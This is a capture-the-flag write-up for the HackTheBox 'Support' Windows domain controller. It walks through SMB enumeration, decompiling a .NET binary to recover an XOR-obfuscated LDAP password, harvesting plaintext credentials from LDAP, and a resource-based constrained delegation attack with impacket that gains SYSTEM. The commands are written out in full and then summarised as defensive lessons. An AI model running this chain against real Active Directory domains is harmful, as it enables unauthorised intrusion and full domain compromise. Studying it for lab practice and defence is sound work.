Introduction
The HackTheBox "Support" machine is a masterclass in realistic Active Directory exploitation. It demonstrates how a single exposed credential can cascade through misconfigured permissions, ultimately leading to complete domain compromise.
In this writeup, we'll walk through the complete attack chain: from initial reconnaissance to extracting both the user and root flags. Along the way, we'll uncover vulnerabilities in SMB access controls, weak credential storage, and dangerous Active Directory delegation configurations.
1. Reconnaissance: Mapping the Target
Let's start by identifying what's running on the machine with Nmap:
nmap -sC -sV -A <MACHINE-IP>
Key Findings:
- Port 53: DNS (Simple DNS Plus)
- Port 88: Kerberos
- Port 135/445: Windows RPC and SMB
- Port 389/3268: LDAP (Active Directory)
- Port 5985: WinRM (Windows Remote Management)
This is clearly a Windows Active Directory domain controller. The LDAP output reveals the domain name: support.htb
dig @<MACHINE-IP> support.htb any
echo "<MACHINE-IP> support.htb dc.support.htb" | sudo tee -a /etc/hosts
2. SMB Enumeration: Finding the Weak Link
smbclient -L <MACHINE-IP>
Sharename Type Comment
─────────────────────────────────────
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
Most shares are protected, but there's a custom share: support-tools — accessible to everyone.
2.1 Downloading from the Support-Tools Share
smbclient //<MACHINE-IP>/support-tools -N
smb: \> ls
Files found:
- 7-ZipPortable_21.07.paf.exe
- npp.8.4.1.portable.x64.zip
- putty.exe
- SysinternalsSuite.zip
- UserInfo.exe.zip ← Suspicious
- windirstat1_1_2_setup.exe
- WiresharkPortable64_3.6.5.paf.exe
smb: \> get UserInfo.exe.zip
unzip UserInfo.exe.zip
3. Initial Foothold: Extracting Hidden Credentials
3.1 Identifying the Binary Type
file UserInfo.exe
# Output: PE32 executable (console) Intel 80386 Mono/.Net assembly
This is a 32-bit .NET application — easily decompiled back to source code.
3.2 Decompiling the Application
ilspycmd UserInfo.exe > output.cs
After analyzing the decompiled code, we discover something critical:
private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
private static byte[] key = Encoding.ASCII.GetBytes("armando");
public static string getPassword()
{
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
}
return Encoding.Default.GetString(array2);
}
What we found:
- Hardcoded Base64-encoded password
- XOR encryption key:
armando - Additional XOR constant:
0xDF
3.3 Decrypting the Password
#!/usr/bin/env python3
import base64
import sys
def decrypt_xor(enc_password, key, xor_constant=0xDF):
if isinstance(key, str):
key = key.encode()
data = base64.b64decode(enc_password)
decoded = bytearray()
for i in range(len(data)):
decoded.append((data[i] ^ key[i % len(key)]) ^ xor_constant)
return decoded.decode()
if __name__ == "__main__":
enc_password = sys.argv[1]
key = sys.argv[2]
xor_constant = int(sys.argv[3]) if len(sys.argv) > 3 else 0xDF
try:
decrypted = decrypt_xor(enc_password, key, xor_constant)
print(f"[+] Decrypted: {decrypted}")
except Exception as e:
print(f"[-] Error: {e}", file=sys.stderr)
sys.exit(1)
python3 decrypt.py 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E 'armando'
# [+] Decrypted: nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP credentials: ldap : nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz
4. LDAP Enumeration: Finding the Admin Password
ldapsearch -x -H ldap://<MACHINE-IP> \
-D "support\\ldap" \
-w 'nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b "dc=support,dc=htb" \
"(ObjectClass=User)" "*"
The info field on the support user contains plaintext credentials: support : Ironside47pleasure40Watchful
This is a critical security failure — passwords should never be stored in AD attributes in plaintext.
4.1 Mapping Permissions with BloodHound
bloodhound-python -d support.htb \
-u ldap \
-p 'nvEfEK16^aM4$e7AclUf8x$tRWxPWO1%lmz' \
-dc dc.support.htb \
-ns <MACHINE-IP> \
-c All
BloodHound reveals: the support user is a member of Remote Management Users — WinRM access is possible.
5. User Flag: Getting Shell Access
evil-winrm -i <MACHINE-IP> -u support -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Desktop> type user.txt
11.........c5
User flag captured!
6. Privilege Escalation: The RBCD Attack
BloodHound shows a dangerous attack path:
support user → Shared Support Accounts → GenericAll over → Domain Controller
6.1 Understanding RBCD
RBCD allows a compromised computer account to impersonate any user when accessing another resource. By creating a fake computer and configuring it for delegation, we can impersonate the Administrator.
6.2 Creating a Fake Computer Account
impacket-addcomputer support.htb/support:'Ironside47pleasure40Watchful' \
-dc-ip <MACHINE-IP> \
-computer-name 'FAKEPC$' \
-computer-pass 'Pass123!@#'
6.3 Configuring Delegation
impacket-rbcd support.htb/support:'Ironside47pleasure40Watchful' \
-delegate-from 'FAKEPC$' \
-delegate-to 'DC$' \
-action write \
-dc-ip <MACHINE-IP>
6.4 Impersonating the Administrator
impacket-getST support.htb/'FAKEPC$':'Pass123!@#' \
-spn cifs/dc.support.htb \
-impersonate administrator \
-dc-ip <MACHINE-IP>
export KRB5CCNAME=administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
7. Root Flag: Domain Admin Access
impacket-smbexec support.htb/administrator@dc.support.htb -k -no-pass
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
33d............daf
Root flag captured!
8. Attack Chain Summary
| Step | Action |
|---|---|
| Reconnaissance | Nmap identified AD infrastructure |
| SMB Enumeration | Anonymous access revealed UserInfo.exe.zip |
| Binary Decompilation | ILSpy extracted XOR-encrypted LDAP credentials |
| Credential Recovery | Python script decrypted the password |
| LDAP Query | Plaintext password found in support user's info field |
| WinRM Access | Shell via evil-winrm |
| Privilege Escalation | RBCD attack via BloodHound-identified path |
| Domain Admin | S4U2Proxy impersonated Administrator |
9. Key Vulnerabilities & Lessons
1. Anonymous SMB Share — Disable anonymous access, enforce authentication.
2. Hardcoded Credentials — Use secret vaults, never embed credentials in code.
3. Weak XOR Encryption — Use AES with proper key management.
4. Plaintext Credentials in LDAP — Never store sensitive data in directory attributes.
5. Unrestricted WinRM — Restrict to trusted admin networks only.
6. Over-Privileged Groups — Enforce least privilege, audit memberships regularly.
7. GenericAll on DC Object — Review and restrict AD object permissions.
8. Misconfigured RBCD — Audit delegation configurations regularly.
9. No Monitoring — Implement AD logging and real-time alerting.
Conclusion
The Support machine illustrates a common real-world scenario: a single exposed credential escalates into complete domain compromise through a chain of misconfigurations.
Key Takeaways:
- Never trust anonymous SMB shares — they're reconnaissance goldmines
- Always scrutinize binaries for hardcoded secrets
- Monitor and audit AD group memberships and permissions
- Implement the principle of least privilege
- Enable comprehensive logging and alerting for suspicious AD activity
This attack chain is entirely preventable with proper security controls. What's your biggest takeaway from this writeup?
Top comments (0)